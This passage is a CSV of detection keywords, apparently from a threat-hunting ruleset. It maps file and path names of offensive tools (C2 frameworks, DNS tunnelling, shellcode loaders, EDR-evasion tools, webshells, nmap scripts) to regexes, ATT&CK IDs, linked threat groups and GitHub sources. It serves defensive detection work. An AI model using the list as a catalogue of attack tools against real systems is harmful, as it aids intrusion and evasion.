"*/Invoke-SocksProxy.git*",".{0,1000}\/Invoke\-SocksProxy\.git.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","8166"
"*/Invoke-SocksProxy/*",".{0,1000}\/Invoke\-SocksProxy\/.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","8167"
"*/Invoke-Stealth.git*",".{0,1000}\/Invoke\-Stealth\.git.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8168"
"*/invoke-stealth.php*",".{0,1000}\/invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8169"
"*/Invoke-Stealth.ps1*",".{0,1000}\/Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","8170"
"*/Invoke-WMILM.ps1*",".{0,1000}\/Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8171"
"*/iodine-*-windows.zip*",".{0,1000}\/iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8173"
"*/iodine.exe*",".{0,1000}\/iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8174"
"*/iodine.git*",".{0,1000}\/iodine\.git.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8175"
"*/iodine-master/*",".{0,1000}\/iodine\-master\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8176"
"*/ionide *",".{0,1000}\/ionide\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","8177"
"*/io-tl/Mara*",".{0,1000}\/io\-tl\/Mara.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","8178"
"*/IOXIDResolver.py*",".{0,1000}\/IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8179"
"*/ip_spoof.rb*",".{0,1000}\/ip_spoof\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8180"
"*/IPayloadService.*",".{0,1000}\/IPayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","8181"
"*/ip-forwarding.nse*",".{0,1000}\/ip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8182"
"*/IPfuscation.cpp*",".{0,1000}\/IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","8183"
"*/IPfuscation.exe*",".{0,1000}\/IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","8184"
"*/ip-geolocation-geoplugin.nse*",".{0,1000}\/ip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8185"
"*/ip-geolocation-ipinfodb.nse*",".{0,1000}\/ip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8186"
"*/ip-geolocation-map-bing.nse*",".{0,1000}\/ip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8187"
"*/ip-geolocation-map-google.nse*",".{0,1000}\/ip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8188"
"*/ip-geolocation-map-kml.nse*",".{0,1000}\/ip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8189"
"*/ip-geolocation-maxmind.nse*",".{0,1000}\/ip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8190"
"*/ip-https-discover.nse*",".{0,1000}\/ip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8191"
"*/ipidseq.nse*",".{0,1000}\/ipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8192"
"*/ipmi_passwords.txt*",".{0,1000}\/ipmi_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8193"
"*/ipmi-brute.nse*",".{0,1000}\/ipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8194"
"*/ipmi-cipher-zero.nse*",".{0,1000}\/ipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8195"
"*/ipmi-version.nse*",".{0,1000}\/ipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8196"
"*/IPPrintC2.git*",".{0,1000}\/IPPrintC2\.git.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","8197"
"*/IPPrintC2.ps1*",".{0,1000}\/IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","8198"
"*/ipv6-multicast-mld-list.nse*",".{0,1000}\/ipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8204"
"*/ipv6-node-info.nse*",".{0,1000}\/ipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8205"
"*/ipv6-ra-flood.nse*",".{0,1000}\/ipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8206"
"*/irc-botnet-channels.nse*",".{0,1000}\/irc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8207"
"*/irc-brute.nse*",".{0,1000}\/irc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8208"
"*/irc-info.nse*",".{0,1000}\/irc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8209"
"*/irc-sasl-brute.nse*",".{0,1000}\/irc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8210"
"*/irc-unrealircd-backdoor.nse*",".{0,1000}\/irc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8211"
"*/irs.exe*",".{0,1000}\/irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","8212"
"*/iscsi-brute.nse*",".{0,1000}\/iscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8213"
"*/iscsi-info.nse*",".{0,1000}\/iscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8214"
"*/isns-info.nse*",".{0,1000}\/isns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8215"
"*/itsdangerous.zip*",".{0,1000}\/itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8216"
"*/itsecteam_shell.php*",".{0,1000}\/itsecteam_shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8217"
"*/ItWasAllADream.git*",".{0,1000}\/ItWasAllADream\.git.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","8218"
"*/Ivy/Cryptor*",".{0,1000}\/Ivy\/Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","8219"
"*/Ivy/Loader/*",".{0,1000}\/Ivy\/Loader\/.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","8220"
"*/jackdaw.exe",".{0,1000}\/jackdaw\.exe","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8221"
"*/jackdaw.git*",".{0,1000}\/jackdaw\.git.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8222"
"*/jackdaw.zip",".{0,1000}\/jackdaw\.zip","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8223"
"*/jackit*",".{0,1000}\/jackit.{0,1000}","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Exploitation tool","https://github.com/insecurityofthings/jackit","1","0","N/A","network exploitation tool","N/A","9","842","152","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z","8224"
